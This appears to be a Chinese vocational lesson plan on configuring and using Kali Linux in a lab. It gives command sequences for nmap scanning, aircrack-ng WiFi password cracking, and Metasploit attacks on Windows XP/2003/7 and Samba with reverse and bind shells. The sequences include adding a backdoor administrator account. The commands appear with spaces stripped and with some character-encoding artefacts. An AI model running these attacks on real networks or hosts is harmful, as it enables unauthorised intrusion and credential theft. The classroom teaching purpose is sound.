《linux服務器配置與管理》教案15-任務十五 KALI操作系統(tǒng)的配置和使用

教案授課章節(jié)任務十五：KALI操作系統(tǒng)的配置和使用（4課時）教學目標1.KALI服務器的安全工具使用2.掌握KALI服務器的安全工具使用教學內容1.學習NMAP安全工具2.學習aircrack安全工具破解wifi密碼3.學習安全漏洞檢測工具攻擊windowsXP、windows20034.使用安全漏洞檢測工具攻擊LINUX、windows7重點難點1.學習NMAP安全工具2.學習aircrack安全工具破解wifi密碼3.學習安全漏洞檢測工具攻擊windowsXP攻擊windows20034.使用安全漏洞檢測工具攻擊LINUX靶機攻擊windows7教學方法1．采用“項目引導”、“任務驅動”教學方法，并以實踐操作演示進行講解。2．在課堂上注意講、學、做相結合，注重“問題引導”學生互動，充分調動學生的積極性，培養(yǎng)學習興趣、分析問題和解決問題的能力以及自學能力。課前準備教學環(huán)境準備：1．“教、學、做”一體化學生機房，教師機需要連接投影儀或者安裝同屏教學軟件；2．學生一人一機、可將學生每4-6人分為一組；3．機房電腦操作系統(tǒng)安裝好VMWareWorkstation14.0、需要CentOS7.4鏡像。學生預習要求：1．閱讀紙質教材，查閱與本章節(jié)相關資料；2．在教學平臺上學習教材電子版和課件。教學過程師生活動：一、復習提問1.如何檢查服務器的系統(tǒng)基本信息2.如何文件及目錄權限、進程管理二、導入新課1.無線網絡檢測：無線網絡不需要受到網線接入的位置限制，操作起來方便快捷，但是其所存在的安全問題也日益突出，已經威脅到無線網絡的正常運行。存在的主要安全問題有：無線網絡盜用、竊聽網絡通信、釣魚攻擊無線網絡、控制用戶的無線AP等。無線網絡安全問題的應對措施有：限制無線網絡的接入、隱藏SSID、選擇合適的安全標準、修改無線路由器的密碼、降低無線AP的功率等。2.滲透測試軟件檢測操作系統(tǒng)安全三、講授新課1.任務描述：某單位在網絡安全檢查中，需要使用KALI操作系統(tǒng)，用于網絡安全檢測及調查取證。系統(tǒng)管理員在使用KALI過程中，需要使用安全漏洞檢測工具以及無線安全工具檢驗密碼強度及系統(tǒng)的強壯性。2.決策指導：KaliLinux預裝了許多滲透測試軟件，包括nmap、Wireshark、JohntheRipper，以及Aircrack-ng等。用戶可通過硬盤、liveCD或liveUSB方式來運行。它既有32位和64位的鏡像，用于x86指令集。又有基于ARM架構、樹莓派和三星的ARMChromebook的鏡像。集成超過300個滲透測試軟件，給用戶提供了大量的安全工具。3.安裝配置命令知識要點1.學習NMAP安全工具nmap-sS-p1-65535-vnmap-p80--script=http-enum.nse2.學習aircrack安全工具破解wifi密碼airmon-ngstartwlan0airodump-ngwlan0monairodump-ng-c10--bssid00:27:19:4C:3F:6C-w90AB.capwlan0monaireplay-ng-020-a00:27:19:4C:3F:6C-c7C:B2:32:1F:A9:0Ewlan0monairmon-ngstopwlan0monaircrack-ng-a2-b00:27:19:4C:3F:6C-w/usr/share/wordlist/rockyou.txt3F6C.cap3.學習安全漏洞檢測工具攻擊windowsXP、windows2003Msfconfsolenmap--script=smb-check-vulns--script-args=unsafe=1useexploit/windows/smb/ms08_067_netapisetpayloadwindows/meterpreter/reverse_tcpshowoptionssetRHOST6setLHOST37exploitnetuserhacker123456/addnetlocalgroupadministratorhacker/add4.使用安全漏洞檢測工具攻擊LINUX、windows7searchsambauseexploit/multi/samba/usermap_scriptShowpayloadsSetpayloadcmd/unix/bind_netcatShowoptionssetRHOST07exploituseexploit/windows/browser/ms10_046_shortcut_icon_dllloader4.任務實施過程一：學習NMAP安全工具5.任務實施過程二：學習aircrack安全工具破解wifi密碼6.任務實施過程三：學習安全漏洞檢測工具、攻擊windowsXP攻擊windows20037.任務實施過程四：使用安全漏洞檢測工具、攻擊LINUX靶機攻擊windows78.Nmap常用參數參數說明-sPping掃描，Nmap在掃描端口時，默認都會使用ping掃描-sL簡單列表掃描-sn使用PING主機方式-sV監(jiān)測端口服務版本操作系統(tǒng)信息主機名等-sS半開掃描-sTTCP方式掃描，會在目標主機的日志中記錄大批連接請求和錯誤信息。-sUUDP掃描，UDP掃描是不可靠的-sA這項高級的掃描方法通常用來穿過防火墻的規(guī)則集-sF-sN秘密FIN數據包掃描、XmasTree、Null掃描模式-sC腳本掃描-A全面系統(tǒng)檢測、啟用腳本檢測、掃描等-O啟用遠程操作系統(tǒng)檢測，但可能存在誤報-V-v-v顯示掃描過程，推薦使用-PN掃描之前不使用ping命令-p指定端口，如“1-65535、1433、135、22、80、3389”等-h幫助文檔-T4針對TCP端口禁止動態(tài)掃描延遲超過10ms設置時間模板-iL讀取主機列表，“-iLD:\iplist.txt”-oN-oX-oG將報告寫入文件，分別是正常、XML、grepable三種格式-traceroute路由跟蹤掃描--script按照腳本分類進行掃描-6開啟IPv6掃描9.本小節(jié)用到的命令。useexploit/windows/browser/ms10_046_shortcut_icon_dllloadersetpayloadwindows/meterpreter/reverse_tcpsetSRVHOST37setRHOST36setLHOST37四、課堂練習1.開啟SSH學習crunch密碼工具2.學習aircrack安全工具3.使用NMAP工具4.學習aircrack安全工具5.破解wifi密碼6.學習安全漏洞檢測工具7.攻擊windowsXP攻擊windows20038.攻擊LINUX靶機攻擊windows7學生活動：觀看教師演示、邊學邊做、思考、討論、完成任務實踐五、課堂小結1．總結本課學習內容2．總結、評價學生小組活動情況二次備課布置作業(yè)1.完成課后鞏固練習題；2.上交書面作業(yè)或者在教學平臺上完成電子文檔上傳；3.觀看下一任務的微課或者項目實錄視頻。板書設計1.學習NMAP安全工具2.學習aircrack安全工具破解wifi密碼3.學習安全漏洞檢測工具攻擊windowsXP、windows20034.使用安全漏洞檢測工具攻擊LINUX、windows7教后反思通過學生互動活動，有利于學生自主學習與合作交流。一能加深對識別法的認識，有助對教學內容的鞏固；二利用這一互動活動，及時反饋信息，有利于教師調整教學策略，優(yōu)化教學方法，提高教學質量。學生完成教學任務評價表評價指標及評價內容★★★★★★評價方式基本操作20分部署KALI操作系統(tǒng)教師評價開啟SSH學習crunch密碼工具動手做20